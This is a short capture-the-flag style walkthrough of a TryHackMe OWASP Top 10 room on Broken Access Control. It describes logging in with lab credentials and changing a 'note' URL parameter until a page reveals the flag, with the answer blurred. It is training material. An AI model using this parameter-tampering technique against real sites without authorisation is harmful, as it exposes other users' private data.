Try Hack Me: OWASP Top 10 Room Day 5 of 10

This is a FREE (meaning you don’t have to pay for subscription, just create an account) room on Try Hack Me that contains challenges with a goal to teach one of the OWASP vulnerabilities everyday for 10 days in a row. The challenges are:

Day 1: Injection

Day 2: Broken Authentication

Day 3: Sensitive Data Exposure

Day 4: XML External Entity

Day 5: Broken Access Control

Day 6: Security Misconfiguration

Day 7: Cross-site Scripting

Day 8: Insecure Deserialization

Day 9: Components with Known Vulnerabilities

Day 10: Insufficient Logging & Monitoring

Today’s challenge is Day 5: Broken Access Control. I blurred the answer so you will have to do the steps yourself to reveal it.

There is only one question to answer for this challenge: (I was assigned a web server IP of 10.10.60.242. Check your assigned IP address, yours will be different from mine).

• Enter the username noot and the password test1234 to login as per the instruction. Then try to search for a way to exploit a misconfiguration in the way user input is handled called Insecure Direct Object Reference

Login screen

Username and password input

Notice the note parameter is =1

Changed the parameter to =2, but the page is empty

Changed parameter to =3, and the page is still empty

Found the correct value of the parameter that contains the flag

It is free to sign up for an account. Visit https://tryhackme.com